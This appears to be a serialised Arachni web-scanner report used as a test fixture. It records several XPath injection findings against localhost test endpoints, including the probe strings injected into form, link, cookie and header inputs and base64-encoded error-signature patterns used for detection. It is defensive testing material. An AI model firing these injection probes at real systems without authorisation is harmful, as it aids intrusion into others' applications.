Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg==
- !binary |-
RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh
dGlvbiBTdGVwcw==
- !binary |-
RW1wdHkgUGF0aCBFeHByZXNzaW9u
- !binary |-
RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA==
- !binary |-
RW1wdHkgVW5pb24gRXhwcmVzc2lvbg==
- !binary |-
RXhwZWN0ZWQgJyknIGlu
- !binary |-
RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl
ciBheGlzIG9wZXJhdG9y
- !binary |-
SW5jb21wYXRpYmxlIFhQYXRoIGtleQ==
- !binary |-
SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc=
- !binary |-
bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA==
- !binary |-
eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24=
- !binary |-
ZXJyb3IgJzgwMDA0MDA1Jw==
- !binary |-
QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt
ZW50Lg==
- !binary |-
RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu
- !binary |-
RXhwZWN0ZWQgdG9rZW4gJ10n
- !binary |-
PHA+bXN4bWw0LmRsbDwvZm9udD4=
- !binary |-
PHA+bXN4bWwzLmRsbDwvZm9udD4=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''"'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default'"
:follow_location: true
:injected: default'"
:combo:
!binary "aW5wdXQ=": default'"
:action: http://localhost:13111/general/form/append
:verification: false
:id: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
var: input
url: http://localhost:13111/general/form/append
injected: default'"
id: A closing bracket expected in
regexp: A closing bracket expected in
regexp_match: A closing bracket expected in
elem: form
remarks: {}
method: GET
response: ! 'A closing bracket expected in
An operand in Union Expression does not produce a node-set
Cannot convert expression to a number
Document Axis does not allow any context Location Steps
Empty Path Expression
Empty Relative Location Path
Empty Union Expression
Expected '')'' in
Expected node test or name specification after axis operator
Incompatible XPath key
Incorrect Variable Binding
A document must contain exactly one root element.
Expected token '']''
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDUz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo0NiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: XPath Injection
description: XPath queries can be injected into the web application.
tags:
- xpath
- database
- error
- injection
- regexp
cwe: '91'
cwe_url: http://cwe.mitre.org/data/definitions/91.html
severity: High
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
mod_name: XPath Injection
variations: []
internal_modname: XPathInjection
internal_modname: XPathInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
var: input
url: http://localhost:13111/general/link/append?input=default
elem: link
method: GET
name: XPath Injection
description: XPath queries can be injected into the web application.
tags:
- xpath
- database
- error
- injection
- regexp
cwe: '91'
cwe_url: http://cwe.mitre.org/data/definitions/91.html
severity: High
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
mod_name: XPath Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
:match: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
:substring:
- !binary |-
eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA==
- !binary |-
U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ==
- !binary |-
WFBhdGhFeGNlcHRpb24=
- !binary |-
TVMuSW50ZXJuYWwuWG1sLg==
- !binary |-
VW5rbm93biBlcnJvciBpbiBYUGF0aA==
- !binary |-
b3JnLmFwYWNoZS54cGF0aC5YUGF0aA==
- !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
- !binary |-
QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1
Y2UgYSBub2RlLXNldA==
- !binary |-
Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg==
- !binary |-
RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh
dGlvbiBTdGVwcw==
- !binary |-
RW1wdHkgUGF0aCBFeHByZXNzaW9u
- !binary |-
RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA==
- !binary |-
RW1wdHkgVW5pb24gRXhwcmVzc2lvbg==
- !binary |-
RXhwZWN0ZWQgJyknIGlu
- !binary |-
RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl
ciBheGlzIG9wZXJhdG9y
- !binary |-
SW5jb21wYXRpYmxlIFhQYXRoIGtleQ==
- !binary |-
SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc=
- !binary |-
bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA==
- !binary |-
eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24=
- !binary |-
ZXJyb3IgJzgwMDA0MDA1Jw==
- !binary |-
QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt
ZW50Lg==
- !binary |-
RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu
- !binary |-
RXhwZWN0ZWQgdG9rZW4gJ10n
- !binary |-
PHA+bXN4bWw0LmRsbDwvZm9udD4=
- !binary |-
PHA+bXN4bWwzLmRsbDwvZm9udD4=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! ']]]]]]]]]'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default]]]]]]]]]
:follow_location: true
:injected: default]]]]]]]]]
:combo:
!binary "aW5wdXQ=": default]]]]]]]]]
:action: http://localhost:13111/general/link/append?input=default
:verification: false
:id: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
var: input
url: http://localhost:13111/general/link/append?input=default
injected: default]]]]]]]]]
id: A closing bracket expected in
regexp: A closing bracket expected in
regexp_match: A closing bracket expected in
elem: link
remarks: {}
method: GET
response: ! 'A closing bracket expected in
An operand in Union Expression does not produce a node-set
Cannot convert expression to a number
Document Axis does not allow any context Location Steps
Empty Path Expression
Empty Relative Location Path
Empty Union Expression
Expected '')'' in
Expected node test or name specification after axis operator
Incompatible XPath key
Incorrect Variable Binding
A document must contain exactly one root element.
Expected token '']''
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDUz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo0NyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: XPath Injection
description: XPath queries can be injected into the web application.
tags:
- xpath
- database
- error
- injection
- regexp
cwe: '91'
cwe_url: http://cwe.mitre.org/data/definitions/91.html
severity: High
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
mod_name: XPath Injection
variations: []
internal_modname: XPathInjection
internal_modname: XPathInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
var: cookie2
url: http://localhost:13111/general/cookie/append
elem: cookie
method: GET
name: XPath Injection
description: XPath queries can be injected into the web application.
tags:
- xpath
- database
- error
- injection
- regexp
cwe: '91'
cwe_url: http://cwe.mitre.org/data/definitions/91.html
severity: High
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
mod_name: XPath Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
:match: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
:substring:
- !binary |-
eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA==
- !binary |-
U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ==
- !binary |-
WFBhdGhFeGNlcHRpb24=
- !binary |-
TVMuSW50ZXJuYWwuWG1sLg==
- !binary |-
VW5rbm93biBlcnJvciBpbiBYUGF0aA==
- !binary |-
b3JnLmFwYWNoZS54cGF0aC5YUGF0aA==
- !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
- !binary |-
QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1
Y2UgYSBub2RlLXNldA==
- !binary |-
Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg==
- !binary |-
RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh
dGlvbiBTdGVwcw==
- !binary |-
RW1wdHkgUGF0aCBFeHByZXNzaW9u
- !binary |-
RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA==
- !binary |-
RW1wdHkgVW5pb24gRXhwcmVzc2lvbg==
- !binary |-
RXhwZWN0ZWQgJyknIGlu
- !binary |-
RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl
ciBheGlzIG9wZXJhdG9y
- !binary |-
SW5jb21wYXRpYmxlIFhQYXRoIGtleQ==
- !binary |-
SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc=
- !binary |-
bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA==
- !binary |-
eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24=
- !binary |-
ZXJyb3IgJzgwMDA0MDA1Jw==
- !binary |-
QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt
ZW50Lg==
- !binary |-
RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu
- !binary |-
RXhwZWN0ZWQgdG9rZW4gJ10n
- !binary |-
PHA+bXN4bWw0LmRsbDwvZm9udD4=
- !binary |-
PHA+bXN4bWwzLmRsbDwvZm9udD4=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''"'
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value'"
:injected: cookie value'"
:combo:
!binary "Y29va2llMg==": cookie value'"
:action: http://localhost:13111/general/cookie/append
:verification: false
:id: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
var: cookie2
url: http://localhost:13111/general/cookie/append
injected: cookie value'"
id: A closing bracket expected in
regexp: A closing bracket expected in
regexp_match: A closing bracket expected in
elem: cookie
remarks: {}
method: GET
response: ! 'A closing bracket expected in
An operand in Union Expression does not produce a node-set
Cannot convert expression to a number
Document Axis does not allow any context Location Steps
Empty Path Expression
Empty Relative Location Path
Empty Union Expression
Expected '')'' in
Expected node test or name specification after axis operator
Incompatible XPath key
Incorrect Variable Binding
A document must contain exactly one root element.
Expected token '']''
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value'"
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDUz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo1MCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: XPath Injection
description: XPath queries can be injected into the web application.
tags:
- xpath
- database
- error
- injection
- regexp
cwe: '91'
cwe_url: http://cwe.mitre.org/data/definitions/91.html
severity: High
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
mod_name: XPath Injection
variations: []
internal_modname: XPathInjection
internal_modname: XPathInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
var: User-Agent
url: http://localhost:13111/general/header/append
elem: header
method: GET
name: XPath Injection
description: XPath queries can be injected into the web application.
tags:
- xpath
- database
- error
- injection
- regexp
cwe: '91'
cwe_url: http://cwe.mitre.org/data/definitions/91.html
severity: High
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
mod_name: XPath Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
:match: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
:substring:
- !binary |-
eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA==
- !binary |-
U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ==
- !binary |-
WFBhdGhFeGNlcHRpb24=
- !binary |-
TVMuSW50ZXJuYWwuWG1sLg==
- !binary |-
VW5rbm93biBlcnJvciBpbiBYUGF0aA==
- !binary |-
b3JnLmFwYWNoZS54cGF0aC5YUGF0aA==
- !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
- !binary |-
QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1
Y2UgYSBub2RlLXNldA==
- !binary |-
Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg==
- !binary |-
RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh
dGlvbiBTdGVwcw==
- !binary |-
RW1wdHkgUGF0aCBFeHByZXNzaW9u
- !binary |-
RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA==
- !binary |-
RW1wdHkgVW5pb24gRXhwcmVzc2lvbg==
- !binary |-
RXhwZWN0ZWQgJyknIGlu
- !binary |-
RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl
ciBheGlzIG9wZXJhdG9y
- !binary |-
SW5jb21wYXRpYmxlIFhQYXRoIGtleQ==
- !binary |-
SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc=
- !binary |-
bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA==
- !binary |-
eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24=
- !binary |-
ZXJyb3IgJzgwMDA0MDA1Jw==
- !binary |-
QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt
ZW50Lg==
- !binary |-
RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu
- !binary |-
RXhwZWN0ZWQgdG9rZW4gJ10n
- !binary |-
PHA+bXN4bWw0LmRsbDwvZm9udD4=
- !binary |-
PHA+bXN4bWwzLmRsbDwvZm9udD4=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! ']]]]]]]]]'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user]]]]]]]]]
:injected: arachni_user]]]]]]]]]
:combo:
User-Agent: arachni_user]]]]]]]]]
:action: http://localhost:13111/general/header/append
:verification: false
:id: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
var: User-Agent
url: http://localhost:13111/general/header/append
injected: arachni_user]]]]]]]]]
id: A closing bracket expected in
regexp: A closing bracket expected in
regexp_match: A closing bracket expected in
elem: header
remarks: {}
method: GET
response: ! 'A closing bracket expected in
An operand in Union Expression does not produce a node-set
Cannot convert expression to a number
Document Axis does not allow any context Location Steps
Empty Path Expression
Empty Relative Location Path
Empty Union Expression
Expected '')'' in
Expected node test or name specification after axis operator
Incompatible XPath key
Incorrect Variable Binding
A document must contain exactly one root element.
Expected token '']''
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user]]]]]]]]]
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDUz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo1MiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: XPath Injection
description: XPath queries can be injected into the web application.
tags:
- xpath
- database
- error
- injection
- regexp
cwe: '91'
cwe_url: http://cwe.mitre.org/data/definitions/91.html
severity: High
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
mod_name: XPath Injection
variations: []
internal_modname: XPathInjection
internal_modname: XPathInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
var: input
url: http://localhost:13111/php/form/append
elem: form
method: GET
name: XPath Injection
description: XPath queries can be injected into the web application.
tags:
- xpath
- database
- error
- injection
- regexp
cwe: '91'
cwe_url: http://cwe.mitre.org/data/definitions/91.html
severity: High
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
mod_name: XPath Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA==
:match: !binary |-
eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA==
:substring:
- !binary |-
eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA==
- !binary |-
U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ==
- !binary |-
WFBhdGhFeGNlcHRpb24=
- !binary |-
TVMuSW50ZXJuYWwuWG1sLg==
- !binary |-
VW5rbm93biBlcnJvciBpbiBYUGF0aA==
- !binary |-
b3JnLmFwYWNoZS54cGF0aC5YUGF0aA==
- !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
- !binary |-
QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1
Y2UgYSBub2RlLXNldA==
- !binary |-
Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg==
- !binary |-
RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh
dGlvbiBTdGVwcw==
- !binary |-
RW1wdHkgUGF0aCBFeHByZXNzaW9u
- !binary |-
RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA==
- !binary |-
RW1wdHkgVW5pb24gRXhwcmVzc2lvbg==
- !binary |-
RXhwZWN0ZWQgJyknIGlu
- !binary |-
RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl
ciBheGlzIG9wZXJhdG9y
- !binary |-
SW5jb21wYXRpYmxlIFhQYXRoIGtleQ==
- !binary |-
SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc=
- !binary |-
bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA==
- !binary |-
eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24=
- !binary |-
ZXJyb3IgJzgwMDA0MDA1Jw==
- !binary |-
QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt
ZW50Lg==
- !binary |-
RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu
- !binary |-
RXhwZWN0ZWQgdG9rZW4gJ10n
- !binary |-
PHA+bXN4bWw0LmRsbDwvZm9udD4=
- !binary |-
PHA+bXN4bWwzLmRsbDwvZm9udD4=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! ']]]]]]]]]'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default]]]]]]]]]
:follow_location: true
:injected: default]]]]]]]]]
:combo:
!binary "aW5wdXQ=": default]]]]]]]]]
:action: http://localhost:13111/php/form/append
:verification: false
:id: !binary |-
eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA==
var: input
url: http://localhost:13111/php/form/append
injected: default]]]]]]]]]
id: ! 'xmlXPathEval: evaluation failed'
regexp: ! 'xmlXPathEval: evaluation failed'
regexp_match: ! 'xmlXPathEval: evaluation failed'
elem: form
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ! 'xmlXPathEval: evaluation failed
SimpleXMLElement::xpath()
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjo1NCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: XPath Injection
description: XPath queries can be injected into the web application.
tags:
- xpath
- database
- error
- injection
- regexp
cwe: '91'
cwe_url: http://cwe.mitre.org/data/definitions/91.html
severity: High
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
mod_name: XPath Injection
variations: []
internal_modname: XPathInjection
internal_modname: XPathInjection
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
var: input
url: http://localhost:13111/php/link/append?input=default
elem: link
method: GET
name: XPath Injection
description: XPath queries can be injected into the web application.
tags:
- xpath
- database
- error
- injection
- regexp
cwe: '91'
cwe_url: http://cwe.mitre.org/data/definitions/91.html
severity: High
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
mod_name: XPath Injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA==
:match: !binary |-
eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA==
:substring:
- !binary |-
eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA==
- !binary |-
U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ==
- !binary |-
WFBhdGhFeGNlcHRpb24=
- !binary |-
TVMuSW50ZXJuYWwuWG1sLg==
- !binary |-
VW5rbm93biBlcnJvciBpbiBYUGF0aA==
- !binary |-
b3JnLmFwYWNoZS54cGF0aC5YUGF0aA==
- !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
- !binary |-
QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1
Y2UgYSBub2RlLXNldA==
- !binary |-
Q2Fubm90IGNvbnZlcnQgZXhwcmVzc2lvbiB0byBhIG51bWJlcg==
- !binary |-
RG9jdW1lbnQgQXhpcyBkb2VzIG5vdCBhbGxvdyBhbnkgY29udGV4dCBMb2Nh
dGlvbiBTdGVwcw==
- !binary |-
RW1wdHkgUGF0aCBFeHByZXNzaW9u
- !binary |-
RW1wdHkgUmVsYXRpdmUgTG9jYXRpb24gUGF0aA==
- !binary |-
RW1wdHkgVW5pb24gRXhwcmVzc2lvbg==
- !binary |-
RXhwZWN0ZWQgJyknIGlu
- !binary |-
RXhwZWN0ZWQgbm9kZSB0ZXN0IG9yIG5hbWUgc3BlY2lmaWNhdGlvbiBhZnRl
ciBheGlzIG9wZXJhdG9y
- !binary |-
SW5jb21wYXRpYmxlIFhQYXRoIGtleQ==
- !binary |-
SW5jb3JyZWN0IFZhcmlhYmxlIEJpbmRpbmc=
- !binary |-
bGlieG1sMiBsaWJyYXJ5IGZ1bmN0aW9uIGZhaWxlZA==
- !binary |-
eG1sc2VjIGxpYnJhcnkgZnVuY3Rpb24=
- !binary |-
ZXJyb3IgJzgwMDA0MDA1Jw==
- !binary |-
QSBkb2N1bWVudCBtdXN0IGNvbnRhaW4gZXhhY3RseSBvbmUgcm9vdCBlbGVt
ZW50Lg==
- !binary |-
RXhwcmVzc2lvbiBtdXN0IGV2YWx1YXRlIHRvIGEgbm9kZS1zZXQu
- !binary |-
RXhwZWN0ZWQgdG9rZW4gJ10n
- !binary |-
PHA+bXN4bWw0LmRsbDwvZm9udD4=
- !binary |-
PHA+bXN4bWwzLmRsbDwvZm9udD4=
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig:
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE1
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
